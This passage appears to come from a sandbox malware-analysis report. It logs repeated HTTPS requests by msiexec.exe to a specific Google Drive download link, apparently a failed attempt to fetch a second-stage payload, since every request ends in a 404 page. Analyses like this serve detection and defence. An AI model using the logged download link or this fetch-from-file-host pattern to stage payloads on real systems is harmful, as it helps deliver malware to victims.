                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:44 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5oAB6sPMrja3e9BOT45e8w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          40 | 192.168.2.6 | 50025 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:45 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:45 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HEHYDeam7qJ91UIviTN93Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          41 | 192.168.2.6 | 50026 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:46 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:47 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTxSlOmU4DobgMLJHY5ZLRCrtUUgJZTp2ff0-MlYwgJ6caztQ7ZmKKrXMDSA6R7GqQD
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:46 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-ZRvmgYKfVQ5WOzv31RZhNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:47 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o2xdYHte1I_7BhDt_KkOvQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          42 | 192.168.2.6 | 50027 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:47 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:48 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-GSsDnqFNZlrrQdPIK0_POw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          43 | 192.168.2.6 | 50028 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:49 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:49 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSbwdyUoSymxYKtHHdic_Ln2lYlrm9VLVNdZwQLSpjFhlyI3OrxGkUxz69Ck01WM1MZpbrS3ks
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:49 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-xb16yI02nCRC5dwUZV5yrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hqEIxGLl0XUC_Kon7v7eYA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          44 | 192.168.2.6 | 50029 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:50 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:50 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:50 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZCGaWXGa0mYWvowv5AMmmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          45 | 192.168.2.6 | 50030 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:51 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:51 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6gBihxxOlikXi1zu7p4tQrKQ1Uk830iyhrIcjeGwfstEuABXOrAC1vp-SBJukU7lpW
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:51 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jbWxc-j2sUDVkQMuonLMEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:51 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QgnFQz1n1-ggY7Nxwy8ERg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          46 | 192.168.2.6 | 50031 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:52 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:52 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-jjMA3ECDbXFmzh5aNDgphQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          47 | 192.168.2.6 | 50032 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:53 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:54 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTtAQENBuXRdqDUMJSYeG1fS_K-olX84LV8S0Yif-y82c9qG_q0AvKrOsGgkyLzsu4Z3rwUkjM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:54 GMT
                                                                                          Content-Security-Policy: script-src 'nonce-1V457p-AtP3OzN67UpQIXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:54 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Al7czB1_ImpUzVbydk3UrQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          48 | 192.168.2.6 | 50033 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:54 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
